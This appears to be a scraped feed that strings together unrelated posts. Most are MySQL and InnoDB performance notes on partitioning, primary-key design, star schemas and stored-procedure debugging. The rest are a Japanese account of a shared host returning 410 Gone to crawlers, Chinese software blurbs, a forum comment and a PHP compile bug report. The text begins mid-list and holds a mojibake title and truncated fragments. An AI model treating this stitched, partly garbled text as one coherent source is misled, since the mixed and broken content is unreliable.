  2. Secondary indexes should have the option of using storage row-ids to "point at" the main rows as organization keys can be relatively long, and require walking two different B-trees to find the recs. Implementing this could be hard and make inserts slow as otherwise unchanged rows can "move around" while the B-tree is having stuff done to it - requiring secondary indexes to have pointers redone - so there's a design trade-off here. In our environment, we mostly avoid secondary indexes in favor of "search tables", which are basically user-managed indexes.
If I get the energy to do an open-source project, I want to do what I call "vector indexes" and a "vectoring execution engine" that we've basically implemented in user code in our app. If we had "vector indexes", we wouldn't be so reliant on index-organized table structures.
          The joy of MySQL stored procedures        
MySQL stored procedures, or stored functions, can be useful, particularly if you need to do something "iterative" with data that can't be easily done with "simple" SQL such as looping through data or (simple) XML or name-value-pair string parsing. First, a few things to know:

1. MySQL stored procedures are dynamically interpreted, so you won't hit syntax or semantic errors in logical blocks until they're actually executed, so you need to create situations in unit-testing where all logic is executed.

2. If stored procedure A calls stored procedure B, and B gets redefined, A will hang unless it gets redefined after B is redefined.

3. Local variables used with the "cursor FETCH" statement shouldn't have the same names as columns used in FETCH queries. If they do, they'll be NULL and random badness will ensue.

Debugging stored procedures

As far as I know, there's no source-level debugger available for MySQL stored procedures or functions, so you have to be a bit clever and a bit old-school in debugging.

The easiest way to debug stored procedures is to use a variation of the "printf" strategy from programming days of yore. Since you can't print an actual message, an alternate way is to create a "debug_output" table with a "debug_txt varchar(128)" column, and use

insert into debug_output values (concat('my message', ',', 'var1=', var1, ..., 'varN=', varN));

After your procedure runs (or dies), just select from your debug_output table. I also like to create an error_output table for error handling with a single column.

Note that these will greatly impact runtime in tightly coded stored procedures, so you'll want to comment them out. I tried to disable them by using the "BLACKHOLE" storage manager, but this doesn't improve performance significantly.
          MySQL strings: oddness with backslash and LIKE        
Our application supports wildcard searches of the data, and the data occasionally includes LIKE "special" characters, such as '%', '_', and '\'. One thing we learned recently is that escaping a backslash, which is the LIKE default "escape character" in a LIKE query is particularly troublesome.

Here's some examples. Consider the below simple table:

> insert into foo (a) values ('\\');
> insert into foo (a) values ('\\%');

> select * from foo \G
a: '\'
a: '\%'

Now, do a LIKE search of a single backslash character without a wildcard. To get it searched on, you have to add THREE backslashes to the string, and need a total of four backslashes in the string:

> select * from foo where a like '\\\\' \G
a: '\'

To do a LIKE search of a single backslash and a single "escaped" percent sign, you need six backslashes: four to embed one in the data, and two to escape the percent sign:

> select * from foo where a like '\\\\\\%' \G
a: '\%'

Note that if you use simple equality, you need two backslashes to search on a single backslash.
          Partition pruning and WHERE clauses        
If you're using lots of partitions, you'll want to make sure that partition pruning is used, and you aren't always guaranteed that it will be. We had a situation where we have a set of very large (potentially >1B rows, currently ~250M rows) tables that are partitioned on "Unix days" (Unix time rounded to days), that have several hundred partitions, using "hash" partitioning to simplify maintenance. So, to simplify, our table looks something like

create table mytable (id integer, unix_day mediumint, primary key (id, unix_day**)) engine=innodb partition by hash (unix_day) partitions 500;

Let's load up a with 1B records. Assuming even distribution, we'll have 2M records in each partition. Now, let's run the following query, to fetch everything in the past 3 days (ignoring timezones for simplicity):

set @today = unix_timestamp(now()) div 86400;

select id from mytable
where unix_day >= @today - 3;

Since we're using "hash" partitioning, this will end up being a monster table scan on the entire table, taking hours to complete. The problem is this query can't be "pruned" because "hash" partitioning doesn't have an implied order.

However, if we run this query

select id from mytable where unix_day in (@today-3, @today - 2, @today - 1, @today);

we'll get good pruning and only four partitions will be searched. Note that MySQL is also good at exploding small integer ranges (ie, ranges less than the number of partitions) into what amounts to an IN-list for partition pruning purposes, so the above query, which is difficult to code in an app, can be converted to

select id from mytable where unix_day between @today - 3 and @today;

and only four partitions will be searched.

**Note that this "stupid" PRIMARY KEY declaration is necessary to have InnoDB let us use unix_day as a partition key, as partition keys must be part of an existing key (primary or otherwise). Making it a separate KEY - and additional index - would be hugely expensive and unnecessary in our app.
          InnoDB versus MyISAM: large load performance        
The conventional wisdom regarding InnoDB versus MyISAM is that InnoDB is faster in some contexts, but MyISAM is generally faster, particularly in large loads. However, we ran an experiment in which a large bulk load of a mysqldump output file, which is basically plain SQL consisting of some CREATE TABLE and CREATE INDEX statements, and a whole lot of huge INSERT statements, in which InnoDB was the clear winner over MyISAM.

We have a medium-sized database that we have to load every month or so. When loaded, the database is about 6GB in MyISAM, and about 11G in InnoDB, and has a couple hundred million smallish records. The MySQL dump file itself is about 5.6G, and had "ENGINE=MyISAM" in its CREATE TABLE statements that we "sed" substituted to "ENGINE=InnoDB" to do the InnoDB test.

Load time with ENGINE=MyISAM: 203 minutes (3 hours 23 minutes)
Load time with ENGINE=InnoDB: 40 minutes

My guess is that the performance difference is due to the fact that these tables have lots of indexes. Every table has a PRIMARY KEY, and at least one secondary index. InnoDB is generally better at large index loads than MyISAM in our experience, so the extra time MyISAM spends doing index population swamps its advantage in simple load time to the base table storage.

Given our experimental results, we'll now use InnoDB for this table.
          INNODB: When do partitions improve performance?        
PARTITIONs are one of the least understood tools in the database design toolkit.

As an index-organized storage mechanism, InnoDB's partitioning scheme can be extremely helpful for both insert/load performance and read performance in queries that leverage the partition key.

In InnoDB, the best way to think of a partitioned table is as a hash table with separate B-trees in the individual partitions, with the individual B-trees structured around the PRIMARY KEY (as is always the case with InnoDB-managed tables). The partition key is the "bucketizer" for the hash table.

Since the main performance issue in loading data into an InnoDB table is the need to figure out where to put new records in an existing B-Tree structure, a partition scheme that allows new data to go into "new" partitions, with "short" B-trees, will dramatically speed up performance. Also, the slowest loads will be bounded by the maximum size of an individual partition.

A partition scheme I generally like to use is one with several hundred partitions, driven by "Unix days" (ie, Unix time divided by 86400 seconds). Since data is typically obsoleted or archived away after a couple of years, this will allow at most a couple of days of data in a partition.

The partition key needs to be explicitly used in the WHERE clauses of queries in order to take advantage of partition pruning. Note that even if you can figure out how to derive the partition key from other data in the WHERE clause, the query optimizer often can't (or at least isn't coded to do so), so it's better to explicitly include it in the WHERE clause by itself, ANDed with the rest of the WHERE.

Some notes on using MySQL partitions:

1. Secondary indexes won't typically go much faster. Shorter B-trees will help some, but not all that much, particularly since it's hard to do both partition pruning and use a secondary index against the same table in a single query.
2. In MySQL, don't create a secondary index on the partition key, as it will effectively "hide" the partition key from MySQL and result in worse performance than if the partition is directly used.
3. Partitions can't be easily "nested". While you can use a computed expression to map your partition in more recent versions of MySQL, it is difficult for MySQL to leverage one well for the purposes of partition pruning. So, keeping your partitions simple and just using them directly in queries is preferable.
4. If you use "Unix day" as a partition, you'll want to explicitly include it in a query, even if you already have a datetime value in the query and the table. This may make queries look slightly ugly and redundant, but they'll run a lot faster.
5. The biggest "win" in searching from partitioning will be searches on the PRIMARY KEY that also use the partition key, allowing for partition pruning. Also, searches that otherwise would result in a table scan can at least do a "short" table scan only in the partitions of interest if the partition key is used in the query.
          MySQL 5.1 to 5.5 upgrade        
We are in the midst of a MySQL 5.1 to MySQL 5.5 upgrade. Nobody upgrades the database engine on a running production system without a Darn Good Reason, but we had recently run into one with a bug in MySQL 5.1 that was exploding MySQL RAM use on our production server and threatening to crash the production database.

Ultimately, the problem was we wanted to use "statement batching" with UPDATE, which produces a large number of UPDATE statements in a single long string, dramatically improving performance. After a dialog with MySQL's QA people, it turned out that we were hitting a bug in 5.1's query parser in which a lot of RAM was allocated for every statement, and not freed until the entire set of queries in the query text was parsed. So, this wasn't, strictly speaking, a "memory leak", but still an open-ended memory allocation which caused the RAM assigned to MySQL to grow enormously.

5.5 appears to have solved this problem, and we're well along in our acceptance process. Other than a couple of very small issues with syntax that was deprecated in 5.1, but now an actual error in 5.5, all is going well. We'll go live shortly.

          MySQL: Fun with MySQL query logs        
The MySQL "general query log" is very useful for situations where you're trying to figure out and improve or debug a large, complex app. The problem we often run into is that Hibernate logs, JBOSS logs, or other app-level logs miss queries or don't put constant data into queries, or the app itself has a bug in it that results in queries not being logged correctly or at all.

On the other hand, MySQL's "general query log" captures all queries sent to the server when the


system variable is set to 'ON'. A useful way to capture a particular application dialog is to run the app on a lightly-trafficked database instance, preferably an isolated test instance, enable the general log with

mysql> set global general_log = 'on';

quickly do your operation, and then disable the general log with

mysql> set global general_log = 'off';

After this, look at the log. It will have lines starting with a time, a connection ID, some sort of code indicating what happened, and the query text. Figure out which connection ID(s) are interesting, use "grep" on the log to get the lines belonging to the connection IDs of interest, and redirect this output into a SQL file. This can then be edited down to the actual queries (if you remember to put a semicolon at the end of every line), and you can make a simple script that can be run using mysql's shell-level tools.

These are very useful for debugging, benchmarking of the database accesses done by web or GUI-driven applications, or other SQL-based testing.

          PRIMARY KEYs in INNODB: Choose wisely        
PRIMARY KEYs in InnoDB are the primary structure used to organize data in a table. This means the choice of the PRIMARY KEY has a direct impact on performance. And for big datasets, this performance choice can be enormous.

Consider a table with a primary search attribute such as "CITY", a secondary search attribute "RANK", and a third search attribute "DATE".

A simple "traditional" approach to this table would be something like

create table myinfo (city varchar(50),
rank float,
info_date timestamp,
id bigint,
primary key (id)
) engine=innodb;

create index lookup_index
on myinfo (city, rank, info_date);

InnoDB builds the primary table data store in a B-tree structure around "id", as it's the primary key. The index "index_lookup" contains index records for every record in the table, and the primary key of the record is stored as the "lookup key" for the index.

This may look OK at first glance, and will perform decently with up to a few million records. But consider how lookups on myinfo by a query like

select * from myinfo where city = 'San Jose' and rank between 5 and 10 and date > '2011-02-15';

are answered by MySQL:

1. First, the index B-tree is walked to find the records of interest in the index structure itself.
2. Now, for every record of interest, the entire "primary" B-tree is walked to fetch the actual record values.

This means that N+1 B-trees are walked for N result records.

Now consider the following change to the above table:

create table myinfo (city varchar(50),
rank float,
info_date timestamp,
id bigint,
primary key (city, rank, info_date, id)
) engine=innodb;

create index id_lookup on myinfo (id);

The primary key is now a four-column primary key, and since "id" is distinct, it satisfies the uniqueness requirements for primary keys. The above query now only has to walk a single B-tree to be completely answered. Note also that searches against CITY alone or CITY+RANK also benefit.

Let's plug in some numbers, and put 100M records into myinfo. Let's also say that an average search returns 5,000 records.

Schema 1: (Index lookup + Primary Key lookup from index):
Lg (100M) * 1 + 5000 * Lg (100M) = 132903 B-tree operations.

Schema 2: (Primary Key lookup only):
Lg(100M) * 1 = 26 B-tree operations. (Note that this single B-tree ingress operation will fetch 5K records)

So, for this query, Schema 2 is over 5,000 times faster than Schema 1. So, if Schema 2 is answered in a second, Schema 1 will take nearly two hours.

Note that we've played a bit of a trick here, and now lookups on "ID" are relatively expensive. But there are many situations where a table identifier is rarely or never looked up, but used as the primary key as "InnoDB needs a primary key".

See also Schema Design Matters

          Schema Design Matters        
One of the big "black holes" in software engineering is a lack of education and discussion of good, large-scale schema design. Virtually every blog you'll see on databases and performance focuses on tunable parameters and other operational issues, with occasional discussion on particular application-level database features.

This is obviously important, but while "tuning" will improve db performance (and a badly tuned database won't perform well at all), in many applications, the performance home runs are in schema issues.

Good schema design is hard, and in many ways counter-intuitive. To design a good large-scale schema, you'll need knowledge of how the database engine organizes data - so an excessively "abstract" approach is a problem - and you need to know what the applications will do with the schema. Simply representing the data and allowing the composition of "correct" queries is not enough.

And worrying about database normalization is far more trouble than it's worth; a large-scale schema will have to have "search" structures and "fact" or "base storage" structures.

An implication of the popularity of tools like Hadoop has been a tendency to walk away from the problem of general schema design, and focus on purpose-built search approaches that are intended to answer particular inquiries. This is necessary in data mining, but hinders more than helps the design of good, large-scale applications.

Much of the focus on schema design has been on "getting the right answer", which is obviously the zeroth requirement of a useful app, but if the queries effectively never return, are they producing the right answer?

In one of my jobs, I was, in a sense, hired due to this problem. The application was collapsing under the weight of input data, and was imperiling the growth of the company. I was actually hired to create a custom data manager for this application. However, as I looked at the database schemas, I realized that, while they were functional and "correct" schemas that were competently done from the perspective of "good" schema design, they were simply not up to the task of fetching the data that was needed to solve the business problem. In particular, if there were more than a few million entities in the database, the data browser app couldn't answer the sort of pseudo-ad-hoc inquiries users wanted to execute quickly enough to be viable.

Since writing this custom data manager would take at least a year - and the performance issues were hindering the growth of the company - I decided to table the custom data manager and deeply investigate and re-architect the schema design. The schema I came up with borrowed ideas from data warehousing, columnar databases, and Hadoop-style search-specific structures. I also minimized dependence on relational joins in favor of star-schema approaches to searching.

As it turned out, the schema redesign has made the application fast enough that the custom data manager is unnecessary.

The redesigned schema allows the app to currently handle over 100,000,000 entities (and about 2 billion database records), can probably handle at least 10x more, and is far faster than it originally was even with a couple million entities. And since we didn't have to throw hardware and software at the problem, the company's operational costs are very low given how much data (and business) is involved. And since we used MySQL, software costs are minimal.

A focus of this blog will be discussion of good schema design ideas, as well as operational issues around maintaining a good "live" schema.
          Doing star schemas in MySQL...        
One big problem in MySQL is that it can't do a native "star transformation" query. In practice, this means that only one index can be used for a given table in a search.

So, to do a star transformation, you have to jump through some hoops. These hoops may look silly, but they do work well, particularly for large tables (ie, more than 100M recs or so).

The problem is if you have a table that is to be searched in a relatively ad-hoc fashion, particularly if searched columns are ANDed together.

Let's say you have a table like

(id, searchcol1, searchcol2, searchcol3, ... searchcolN, datacol1, datacol2, ... datacolM) primary key (id);

A typical approach would be to create indexes on all the search cols and enumerate searches in the whereclause. The MySQL query optimizer will pick an index for one of them and do simple qualifications on the rest of the searches. This means that you have to hope that your most selective search column gets picked, and that it doesn't visit many rows or your search performance will suck.

An alternate approach is to use "helper tables". These tables are standalone tables with (ID, searchcol[i], ), and use carefully constructed multi-value primary keys with searchcol as the first key column, your other standard searches as the other key components, and the ID as the last key component to guarantee uniqueness.

With helper tables, you do your individual searches into TEMPORARY tables containing only IDs, use "SQL INTERSECT" to implement AND logic and "SQL UNION ALL" to implement OR logic, and put the final result set into a final TEMPORARY table. After this, you can do the lookup on the big table to fetch the final answer.

In practice, this means you're using all indexed searches to "vector in" to the final result set. We've been able to get good "sort of" ad-hoc search performance with up to 500M records with the above approach.
          ãƒ¬ãƒ³ã‚¿ãƒ«ã‚µãƒ¼ãƒã®ãƒšãƒŠãƒ«ãƒ†ã‚£ã§å¼·åˆ¶çš„に「410 Gone」が返される事例に驚いた        

410 Goneとある企業サイトに関して、「数ヶ月前からGoogleの検索結果に一切ヒットしなくなった」という相談を受けました。

  • PCやモバイル端末で使われる一般的なブラウザのユーザエージェント名でアクセスすると、HTTPステータスコードには「200 OK」が返されていて普通に閲覧できる。
  • それ以外のユーザエージェント名でアクセスすると、HTTPステータスコードには「410 Gone」が返されて、一切閲覧できない。

上記のようになっているので、Google Botなどが使っているユーザエージェント名からのアクセスに対しては「410 Gone」が返ります。そのせいで、検索結果からも排除された上で、クローラーのアクセス数も激減していたのでした。
最初は、.htaccessファイルでリダイレクト関連の記述をミスったがための影響かな? と思ったんですが、当該サイトではそもも.htaccessファイルは利用されていませんでした。




  • 人間以外のUAには強制的に『410 Gone』を返す



今回は無警告・無報告で実施されてしまったがために、「なんか数ヶ月前から検索結果に一切出なくなったんだけど」→「じゃあ調べましょうか。……なんか410 Goneを返しまくってるんだけど」→「いや、特にそんな設定をした覚えはないが」→「では原因はどこにあるんだろうか」などという試行錯誤を経る無駄な時間を費やしてしまったわけで。

そもそも、HTTPステータスコードには「高負荷でアクセスできないよ」というような意味を表せる、「503 Service Temporarily Unavailable」があるわけで、アクセス元の区別なくそれを返してくれていれば良かったんじゃないかと思うんですけども。(もしかして、ペナルティというか、「せめて人間には見せてやろう」という配慮なんでしょうか?^^;)

強制的に「410 Gone」が返される現象の原因を探ろうと試行錯誤した記録(^_^;)


1. Google Search Consoleでちゃんとクロールされているかどうかを調べる

検索結果に出てこなくなった際には、まずは「Google Search Console」を覗いてみるのが良いでしょう。クローラーがどれくらいの頻度で訪れて情報を引っ張っているか、何らかのエラーが発生していないか、SEO関連でペナルティを科されていないか、などの情報が得られます。
で、実際にそのサイトの「Google Search Console」で「クロールの統計情報」を見ると、数ヶ月前のある時点から突然クローラーがほとんど来なくなっている事実が判明しました。

Google Search Consoleで調べたクロールの統計情報(少ない) Google Search Consoleで調べたクロールの統計情報(普通)

最初は、そのように「あまりにも反応が遅い」ために、検索エンジンのクローラーがアクセスを諦めてしまっているのかな? と思ったんですが……、

2. Fetch As GoogleでGoogle Botがどのように見ているかを調べる

Google Search Console内にある「Fetch As Google」機能を使うと、Google Botがどのようにウェブページを見ているか(描画しているか)が分かります。

Fetch As Googleのステータスが「見つかりませんでした」エラーになる

※このFetch As Googleでレンダリングリクエストも送っていれば、「完了」の項目をクリックすることで実際の描画結果が画像で見えます。しかし「見つかりませんでした」エラーが出る場合には描画結果も参照できませんでした。

IE、Edge、Firefox、Chromeなどのブラウザで閲覧すれば問題なく見えるのに、「Fetch As Google」では見つからないと言われてしまうので、クローラーにどう見えているのかが判断できません。

3. ユーザエージェント名を変更して、Google Botのようにアクセスして調べる

Google Botがどのように見ているのかを直接調べるために、Google Botを装ってウェブサイトにアクセスしてみることにしました。
具体的には、Windows上のChromeのデベロッパーツールを使って、ブラウザのUA(ユーザエージェント)名をGoogle Botが使っている名称「Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)」に変更してアクセスします。
Google Botを装ってアクセスすると、以下のように「410 Gone」というエラーが返っていました。

Google Botを装ってアクセスすると410 Goneが返る

というわけで、どうやらGoogle Botがウェブサイトにアクセスしようとしても、Google Botにはコンテンツの存在が見えていないようだということが分かりました。なかなか問題は深刻そうです。これならクロール頻度が激減するのも納得です。HTTPステータスコード410とは「もうこのURLにコンテンツは存在しません(消滅しました)」という意味ですから。「404 Not Found」の場合だと「何らかのミスで消えた」とか「一時的に消されてしまっただけ」という可能性もありますが、「410 Gone」をわざわざ返すということは、「運営者の意思で消した」のだろうと推測できますから。

でも、「モバイルなら移動、それ以外ならそのまま」という分岐処理だったので、Google Botにだけ410 Goneを返してしまう原因はなさそうでした。

  • 存在しないURLを指定した場合でも、人間用ブラウザには「404 Not Found」が返るのに、Google Botには「410 Gone」を返している。
  • ユーザエージェント名を「ABC123XYZ」のような適当な文字列にした場合でも、常時「410 Gone」が返される。

この、存在しないURLにアクセスした場合でも「410 Gone」が返されるという事実から、PHPソースの問題ではなく、ウェブサーバの設定の問題だと言えそうです。
また、Google Botを決め打ちしているわけではなく、「PCやモバイルで使われる一般的なブラウザ以外」全部に対して「410 Gone」を返していそうなことも分かりました。

4. ウェブサーバの設定を調べる

いろいろ調べてみたところ、リダイレクトの記述を誤ると「410 Gone」が返ってしまうケースがあることが分かりました。
しかし、リダイレクトする記述を使いながら、リダイレクト先の記述を省略してしまうと、「移動先がない(消滅した)」という解釈で「410 Gone」が返されるようです。

さて、ウェブサーバはApacheでしたので、HTTPステータスコードをどうにかするには .htaccessファイルを使います。
どこかにそういう誤った記述が含まれる .htaccessファイルがあるだろう……と予想したのですが、見つかりません。

ウェブサーバのアクセスログを見てみると、410を返しているケースが多数ありました。Google Botはもちろん、Bing Botに対しても410を返しています。


5. レンタルサーバのサポートに問い合わせて、ペナルティの事実が発覚!


  • 共用サーバなので、負荷が高すぎるサイトには、一般的なブラウザ以外に対して強制的に410を返すペナルティを科している。
  • 何らかの対策が採られたら解除することは可能。



レンタルサーバ会社側が「410 Gone」を返すよう設定するケースもあるのだと……


まあそれはともかくとして、「負荷の高すぎるサイトに強制的に『410 Gone』を返すことでクローラーのアクセスを阻害してアクセス数(負荷)を減らそうとする方針のレンタルサーバ会社があるとは思わなかったので驚いた」という話でした。^^;



          How to interview an amazon database expert        
via GIPHY Amazon releases a new database offering every other day. It sure isn’t easy to keep up. Join 35,000 others and follow Sean Hull on twitter @hullsean. Let’s say you’re hiring a devops & you want to suss out their database knowledge? Or you’re hiring a professional services firm or freelance consultant. Whatever the … Continue reading How to interview an amazon database expert
Smart Apache是一个傻瓜式的Apache网站服务器架设工具,本软件自带并完美支持PHP、MYSQL、Zend Optmizer。..点击浏览详细内容
一套采用 php+mysql 数据库方式运行并可生成 html 页面的高速、强大、完善的开源共享软件系统。该系统经过多年升级,已经拥有完善..点击浏览详细内容
          Comment on Running Multiple MySQL Servers on FreeBSD by Jiří Kubrt        
Hi, this tuto is very nice, but there is problem with the socket, as it shares same socket /tmp/mysql.sock with the first instance. So it is good to include socket=/tmp/mysql1.sock in my.cnf too...
          Comment on Running Multiple MySQL Servers on FreeBSD by Storm        
          mysql table is marked as crashed and last (automatic?) repair failed        
В логах MySQL вижу уже второй раз такую ошибку <span class="kwd">Table</span> <span class="str">'./glpi/glpi_log/'</span> <span class="kwd">is</span><span class="pln"> marked </span><span class="kwd">as</span><span class="pln"> crashed </span><span class="kwd">and</span><span class="pln"> last </span><span class="pun">(</span><span class="pln">automatic</span><span class="pun">?)</span><span class="pln"> repair failed </span> 165 down vote accepted If your MySQL process is running, stop it. On Debian: sudo service mysql stop Go to your data ... Подробнее
          Publishing My OBD2 Cloud Storage Architecture        

After working on the recent Pi based OBD2 logger, I've finally published the storage architecture. The OBD2 Cloud Storage project is on GitHub here:


This project contains the API and the MySQL database. The API is in PHP and uses JSON + REST. It connects to a local MySQL database to store all the OBD2 PID data which a client device can log via the internet and the API calls. A Python SDK is also available on GitHub. I plan on adding SDKs in PHP and then Java (for Android) and ObjectiveC (for iPhones). The SDK is initially in Python because of pybod which is an open source OBD2 reader in Python.

It feels great to let go and publish a project as open source. My day job is at a multi-billion dollar company writing in-house enterprise software. So it's freeing to write open source software for a change that I can share with the world.

          Playing with Pi        

A few months ago I decided to join the party and pickup a Raspberry Pi. It's a $25 full fledged ARM based computer the size of a credit card. There's also a $35 version, of which I ended up buying a handful so far. Due to the cost, this allows you to use a computer in dedicated applications where it otherwise wouldn't be justified or practical. Since then I've been pouring over the different things people have done with their Pi. Here are some that interest me:

  • Setting up security cameras or other dedicated cameras like a traffic cam or bird feeder camera
  • RaspyFi - streaming music player
  • Offsite backup
  • Spotify server
  • Carputer - blackbox for your car
  • Dashcam for my car
  • Home alarm system
  • Digital signage for the family business
  • Console emulator for old school consoles
  • Grocery inventory tracker

Since the Pi runs an ARM based version of Linux, I'm already familiar with practically everything on that list. The OS I've loaded is Raspbian, a Debian variant. This makes it a lot easier to get up and running with.

After recently divesting myself of some large business responsibilities, I've had more personal time to dedicate to things like this. Add in the vacation I took during Christmas and New Years and I had the perfect recipe to dive head-first into a Pi project. What I chose was something that I've always wanted.

The database and Big Data lover in me wants data, lots of it. So I've gone with building a black box for my car that runs all the time the car is on, and logs as much data as I can capture. This includes:

  • OBD2
  • GPS
  • Dashcam
  • and more

Once you've got a daemon running, and the inputs are being saved then the rest is all just inputs. Doesn't matter what it is. It's just input data.

My initial goal is to build a blackbox that constantly logs OBD2 data and stores it to a database. Looking around at what's out there for OBD2 software, I don't see anything that's built for long term logging. All the software out there is meant for 2 use cases: 1)live monitoring 2)tuning the ECU to get more power out of the car. What I want is a 3rd use case: long term logging of all available OBD2 data to a database for analysis.

In order to store all this data I decided to build an OBD2 storage architecture that's comprised of

  • MySQL database
  • JSON + REST web services API
  • SDK that existing OBD2 software would use to store the data it's capturing
  • Wrapping up existing open source OBD2 capture data so it runs as a daemon on the Pi
  • Logging data to a local storage buffer, which then gets synced to the aforementioned cloud storage service when there's an internet connection.

Right now I'm just doing this for myself. But I'm also reaching out to developers of OBD2 software to gauge interest in adding this storage service to their work. In addition to the storage, an API can be added for reading back the data such as pulling DTS (error) codes, getting trends and summary data, and more.

The first SDK I wrote was in Python. It's available on GitHub. It includes API calls to register an email address to get an API key. After that, there are some simple logging functions to save a single PID (OBD2 data point such as RPM or engine temp). Since this has to run without an internet connection I've implemented a buffer. The SDK writes to a buffer in local storage and when there's any internet connection a background sync daemon pulls data off the buffer, sends it to the API and removes the item from the buffer. Since this is all JSON data and very simple key:value data I've gone with a NoSQL approach and used MongoDB for the buffer.

The API is built in PHP and runs on a standard Linux VPS in apache. At this point the entire stack has been built. The code's nowhere near production-ready and is missing some features, but it works enough to demo. I've built a test utility that simulates a client car logging 10 times/second. Each time it's logging 10 different PIDs. This all builds up in the local buffer and the sync script then clears it out and uploads it to the API. With this estimate, the client generates 100 data points per second. For a car being driven an average of 101 minutes per day, that's 606,000 data points per day.

The volume of data will add up fast. For starters, the main database table I'm using stores all the PIDs as strings and stores each one as a separate record. In the future, I'll evaluate pivoting this data so that each PID has it's own field (and appropriate data type) in a table. We'll see which method proves more efficient and easier to query. The OBD2 spec lists all the possible PIDs. Car manufacturers aren't required to use them all, and they can add in their own proprietary ones too. Hence my ambivalence for now about creating a logging table that contains a field for each PID. If most of the fields are empty, that's a lot of wasted storage. 

Systems integration is much more of a factor in this project than coding each underlying piece. Each underlying piece, from what I've found, has already been coded somewhere by some enthusiast. The open source Python code already exists for reading OBD2 data. That solves a major coding headache and makes it easier to plug my SDK into it.

There are some useful smartphone apps that can connect to a Bluetooth OBD2 reader to pull the data. Even if they were to use my SDK, it's still not an ideal solution for logging. In order to log this data, you need a dedicated device that's always on when the car's on and always logging. Using a smartphone can get you most of the way there, but there'll be gaps. That's why I'm focusing on using my Pi as a blackbox for this purpose.

          Drupal updates and server migration        

It seems I get more experience with Linux server migrations and Drupal site migrations that I should. Recently I started a phased approach to winding down and closing my company's Rackspace account. Rackspace provides a solid service, but they just weren't meeting my needs. What it came down to is that on the low-mid end, there are much cheaper options. Also, I wasn't fond of the bandwidth bills I was getting. Hosts like Liquid Web, for example, offer 3 TB of transfer as part of the package. Since the sites I host tend to be heavy on images, audio files, and very large documents, it gets pricey.

So I ended up opening up a VPS account with Linode. I get plenty of bandwidth that so far seems fast enough. The included bandwidth will make it easier on my cash flow when it comes to podcasts and other large numerous downloads.

That means I've been spending hours putting together migration documentation. Always have a solid plan, and test it, before migrating production sites. And on top of that, have a rollback plan. There's nothing worse than a site migration gone wrong and no plan to roll it back.

So far I've migrated half a dozen sites, including this one, to Linode from Rackspace. That includes:

  • Nameserver changes
  • DNS setup
  • apache virtual host setup
  • putting Drupal into Maintenance Mode
  • copying site files over
  • Exporting/Import MySQL db dumps
  • Configuring users and privileges on new server's MySQL db
  • Testing
  • Monitoring

I'm looking forward to lowering my hosting bills for my VPS and using Linode.

This is the first time I've used Drupals multi-site installation. All the sites I host are so different that they run off their own Drupal install. It's a mix of Drupal 6 and Drupal 7. For a new project I've started, I'll be hosting a handful of static content sites. That's where Drupal's multi-site install feature comes into play. Since I never needed it before I almost forgot about it. But for these small one-off content sites using a shared Drupal install with shared modules and themes will make maintenance for me a lot easier and less stressful. With all the modules a typical Drupal  site uses, there's always something that needs to be updated. Multiply that across all the sites I manage and it adds up.

          Comment on MySQL is gone. Here comes MariaDB and Drizzle. by Quique        
Cabe recordar que MariaDB no el único <i>fork</i> de MySQL. <b>Drizzle</b> (http://www.drizzle.org/) deriva del código de MySQL v6.0, pero con un rediseño de la arquitectura, que es de tipo microkernel. Drizzle es un proyecto 100% software libre, dirigido por su comunidad (no por una persona que ya vendió MySQL). Participa activamente en el GSoC. Para más información, visitad su web o la Wikipedia.
          Comment on MySQL is gone. Here comes MariaDB and Drizzle. by 2010 in review « Zero Lines of Code        
[...] MySQL is gone. Here comes MariaDB and Drizzle. May 2010 10 comments 3 [...]
          srinatar@... [2010-03-02 13:25:22]        
Date/time related Bug
Reported by markus.schiegl@...
Tue, 02 Mar 2010 13:25:22 +0000
PHP: 5.2.13, OS: Solaris 10 (Sparc)

PHP 5.2.13 doesn't compile with Sun Studio compiler on Solaris 10 Sparc. Configure works fine (as in 5.2.12), Make fails on ext/date/php_date.c file with:

/bin/sh /opt/build/php/php-5.2.13/libtool --silent --preserve-dup-deps --mode=compile cc -Iext/date/lib -Iext/date/ -I/opt/build/php/php-5.2.13/ext/d
ate/ -DPHP_ATOM_INC -I/opt/build/php/php-5.2.13/include -I/opt/build/php/php-5.2.13/main -I/opt/build/php/php-5.2.13 -I/opt/build/php/php-5.2.13/ext/
date/lib -I/opt/build/php/ext/libxml2/include/libxml2 -I/usr/sfw/include -I/opt/build/php/ext/curl/include -I/opt/build/php/ext/jpeg/include -I/opt/b
uild/php/ext/freetype2/include -I/opt/build/php/ext/freetype2/include/freetype2 -I/opt/build/php/ext/gettext/include -I/opt/build/php/ext/libiconv/in
clude -I/opt/build/php/php-5.2.13/ext/mbstring/oniguruma -I/opt/build/php/php-5.2.13/ext/mbstring/libmbfl -I/opt/build/php/php-5.2.13/ext/mbstring/li
bmbfl/mbfl -I/opt/build/php/ext/libmcrypt/include -I/opt/build/php/ext/freetds/include -I/opt/build/php/ext/mysql/include -I/opt/build/php/ext/instan
tclient/sdk/include -I/opt/build/php/ext/tidy/include -I/opt/build/php/ext/xmlrpc-epi/include -I/opt/build/php/ext/libxslt/include -I/opt/build/php/p
hp-5.2.13/TSRM -I/opt/build/php/php-5.2.13/Zend  -I/opt/build/php/php/ext/libiconv/include -I/opt/build/php/php/ext/gettext/include -D_POSIX_PTHREAD_
SEMANTICS  -I/opt/build/php/ext/libiconv/include -O -xs -xstrconst -zlazyload -xmemalign=8s  -c /opt/build/php/php-5.2.13/ext/date/php_date.c -o ext/
"/opt/build/php/php-5.2.13/ext/date/php_date.c", line 38: warning: no explicit type given
"/opt/build/php/php-5.2.13/ext/date/php_date.c", line 38: syntax error before or at: long
cc: acomp failed for /opt/build/php/php-5.2.13/ext/date/php_date.c
*** Error code 1
make: Fatal error: Command failed for target `ext/date/php_date.lo'

A diff between 5.2.12 and 5.2.13 shows the culprit (php_date_llabs vs. llabs and/or ifndef HAVE_LLABS, because of bug 50266 and bug 50930)

@@ -30,14 +30,12 @@
 #include "lib/timelib.h"
 #include <time.h>

-#ifndef HAVE_LLABS
-# ifdef PHP_WIN32
-static __inline __int64 llabs( __int64 i ) { return i >= 0? i: -i; }
-# elif defined(__GNUC__) && __GNUC__ < 3
-static __inline __int64_t llabs( __int64_t i ) { return i >= 0 ? i : -i; }
-# elif defined(NETWARE) && defined(__MWERKS__)
-static __inline long long llabs( long long i ) { return i >= 0 ? i : -i; }
-# endif
+#ifdef PHP_WIN32
+static __inline __int64 php_date_llabs( __int64 i ) { return i >= 0? i: -i; }
